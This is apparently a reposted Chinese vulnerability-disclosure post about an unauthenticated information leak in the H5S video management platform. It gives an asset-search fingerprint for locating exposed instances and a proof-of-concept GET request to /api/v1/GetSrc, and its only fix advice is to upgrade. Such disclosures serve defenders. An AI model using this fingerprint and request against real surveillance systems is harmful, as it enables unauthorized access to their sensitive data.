文章总结: 本文档披露了H5S视频平台存在敏感信息泄露漏洞,攻击者可通过访问/api/v1/GetSrc接口进行未授权操作,获取系统敏感数据,造成信息泄露或数据篡改风险。文章提供了漏洞详情、资产测绘语法及POC验证代码,并建议用户升级至最新版本以修复漏洞。 综合评分: 75 文章分类: 漏洞POC,漏洞预警,WEB安全
H5S视频平台敏感信息泄露漏洞 附POC
原创
安服仔 安服仔
北风漏洞复现文库
2026年3月4日 09:52 广东
免责声明:请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用。
#
#
01
—
漏洞名称
H5S视频平台敏感信息泄露漏洞
#
02
—
影响版本
03
—
漏洞简介
H5S视频平台是零视技术(上海)有限公司研发的视频管理平台,支持跨平台视频播放与管理,具备低延迟、加密传输、集群级联等功能,适用于监控、直播等场景。攻击者可利用该漏洞访问后台相应端口,执行未授权操作,可能导致系统信息泄露、数据篡改等安全风险。
04
—
资产测绘
"H5S视频平台"
05
—
漏洞复现
POC
GET /api/v1/GetSrc HTTP/1.1Host: 127.0.0.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:148.0) Gecko/20100101 Firefox/148.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.9,zh-TW;q=0.8,zh-HK;q=0.7,en-US;q=0.6,en;q=0.5Accept-Encoding: gzip, deflateConnection: closeCookie: PHPSESSID=mge2krjj3v8sbm97lkv4cfj2n6Upgrade-Insecure-Requests: 1Sec-Fetch-Dest: documentSec-Fetch-Mode: navigateSec-Fetch-Site: noneSec-Fetch-User: ?1Priority: u=0, i
06
—
修复建议
升级至最新版本
07
—
往期回顾
免责声明:
本文所载程序、技术方法仅面向合法合规的安全研究与教学场景,旨在提升网络安全防护能力,具有明确的技术研究属性。
任何单位或个人未经授权,将本文内容用于攻击、破坏等非法用途的,由此引发的全部法律责任、民事赔偿及连带责任,均由行为人独立承担,本站不承担任何连带责任。
本站内容均为技术交流与知识分享目的发布,若存在版权侵权或其他异议,请通过邮件联系处理,具体联系方式可点击页面上方的联系我。
本文转载自:北风漏洞复现文库 安服仔 安服仔《H5S视频平台敏感信息泄露漏洞 附POC》
版权声明
本站仅做备份收录,仅供研究与教学参考之用。
读者将信息用于其他用途的,全部法律及连带责任由读者自行承担,本站不承担任何责任。
评论